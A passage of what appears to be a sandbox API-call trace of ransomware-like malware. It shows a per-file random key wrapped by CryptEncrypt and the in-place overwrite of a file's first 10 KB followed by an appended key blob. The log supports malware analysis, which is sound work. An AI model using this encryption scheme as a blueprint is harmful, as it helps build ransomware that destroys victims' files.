hTemplateFile=0x0) returned 0xffffffff [0092.792] GetProcessHeap () returned 0x2c0000 [0092.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.793] GetProcessHeap () returned 0x2c0000 [0092.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f6e8 | out: hHeap=0x2c0000) returned 1 [0092.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd08 | out: pbBuffer=0x25cfd08) returned 1 [0092.793] GetProcessHeap () returned 0x2c0000 [0092.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd00*=0x30) returned 1 [0092.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\performance.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\performance.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.793] GetProcessHeap () returned 0x2c0000 [0092.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.794] GetProcessHeap () returned 0x2c0000 [0092.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd08 | out: pbBuffer=0x25cfd08) returned 1 [0092.794] GetProcessHeap () returned 0x2c0000 [0092.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfd00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfd00*=0x30) returned 1 [0092.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd00 | out: pbBuffer=0x25cfd00) returned 1 [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcf8*=0x30) returned 1 [0092.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0092.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd00 | out: pbBuffer=0x25cfd00) returned 1 [0092.795] GetProcessHeap () returned 0x2c0000 [0092.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcf8*=0x30) returned 1 [0092.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.795] GetProcessHeap () returned 0x2c0000 [0092.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.796] GetProcessHeap () returned 0x2c0000 [0092.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcf8 | out: pbBuffer=0x25cfcf8) returned 1 [0092.796] GetProcessHeap () returned 0x2c0000 [0092.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcf0*=0x30) returned 1 [0092.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Notes_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\notes_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.796] GetProcessHeap () returned 0x2c0000 [0092.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.796] GetProcessHeap () returned 0x2c0000 [0092.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.796] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcf8 | out: pbBuffer=0x25cfcf8) returned 1 [0092.796] GetProcessHeap () returned 0x2c0000 [0092.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.796] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcf0*=0x30) returned 1 [0092.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIconSubpictur.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttoniconsubpictur.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcf0 | out: pbBuffer=0x25cfcf0) returned 1 [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfce8*=0x30) returned 1 [0092.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\nextmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f5f8 | out: hHeap=0x2c0000) returned 1 [0092.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcf0 | out: pbBuffer=0x25cfcf0) returned 1 [0092.797] GetProcessHeap () returned 0x2c0000 [0092.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfce8*=0x30) returned 1 [0092.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\720x480blacksquare.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\720x480blacksquare.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.798] GetProcessHeap () returned 0x2c0000 [0092.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.798] GetProcessHeap () returned 0x2c0000 [0092.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f418 | out: hHeap=0x2c0000) returned 1 [0092.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfce8 | out: pbBuffer=0x25cfce8) returned 1 [0092.798] GetProcessHeap () returned 0x2c0000 [0092.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfce0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfce0*=0x30) returned 1 [0092.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0092.799] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfce8 | out: pbBuffer=0x25cfce8) returned 1 [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfce0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfce0*=0x30) returned 1 [0092.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0092.799] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfce0 | out: pbBuffer=0x25cfce0) returned 1 [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.799] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcd8*=0x30) returned 1 [0092.799] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.799] GetProcessHeap () returned 0x2c0000 [0092.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.799] GetProcessHeap () returned 0x2c0000 [0092.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfce0 | out: pbBuffer=0x25cfce0) returned 1 [0092.800] GetProcessHeap () returned 0x2c0000 [0092.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcd8*=0x30) returned 1 [0092.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.800] GetProcessHeap () returned 0x2c0000 [0092.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.800] GetProcessHeap () returned 0x2c0000 [0092.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcd8 | out: pbBuffer=0x25cfcd8) returned 1 [0092.800] GetProcessHeap () returned 0x2c0000 [0092.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcd0*=0x30) returned 1 [0092.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.801] GetProcessHeap () returned 0x2c0000 [0092.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.801] GetProcessHeap () returned 0x2c0000 [0092.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0092.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcd8 | out: pbBuffer=0x25cfcd8) returned 1 [0092.801] GetProcessHeap () returned 0x2c0000 [0092.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.801] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcd0*=0x30) returned 1 [0092.801] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.801] GetProcessHeap () returned 0x2c0000 [0092.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.801] GetProcessHeap () returned 0x2c0000 [0092.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcd0 | out: pbBuffer=0x25cfcd0) returned 1 [0092.801] GetProcessHeap () returned 0x2c0000 [0092.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcc8*=0x30) returned 1 [0092.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.802] GetProcessHeap () returned 0x2c0000 [0092.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.802] GetProcessHeap () returned 0x2c0000 [0092.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.802] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcd0 | out: pbBuffer=0x25cfcd0) returned 1 [0092.802] GetProcessHeap () returned 0x2c0000 [0092.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcc8*=0x30) returned 1 [0092.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0092.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcc8 | out: pbBuffer=0x25cfcc8) returned 1 [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcc0*=0x30) returned 1 [0092.807] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcc8 | out: pbBuffer=0x25cfcc8) returned 1 [0092.807] GetProcessHeap () returned 0x2c0000 [0092.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcc0*=0x30) returned 1 [0092.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0092.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcc0 | out: pbBuffer=0x25cfcc0) returned 1 [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcb8*=0x30) returned 1 [0092.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0092.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfcc0 | out: pbBuffer=0x25cfcc0) returned 1 [0092.808] GetProcessHeap () returned 0x2c0000 [0092.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0092.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfcb8*=0x30) returned 1 [0092.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0092.809] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX") returned 82 [0092.809] StrStrW (lpFirst="CHINESET.SHX", lpSrch=".txt") returned 0x0 [0092.809] GetProcessHeap () returned 0x2c0000 [0092.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.809] ReadFile (in: hFile=0x16c, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfc7c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x25cfc7c*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.850] WriteFile (in: hFile=0x16c, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfc7c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x25cfc7c*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] GetProcessHeap () returned 0x2c0000 [0092.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfcbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfc7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfcbc*, lpNumberOfBytesWritten=0x25cfc7c*=0x4, lpOverlapped=0x0) returned 1 [0092.862] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfc7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, 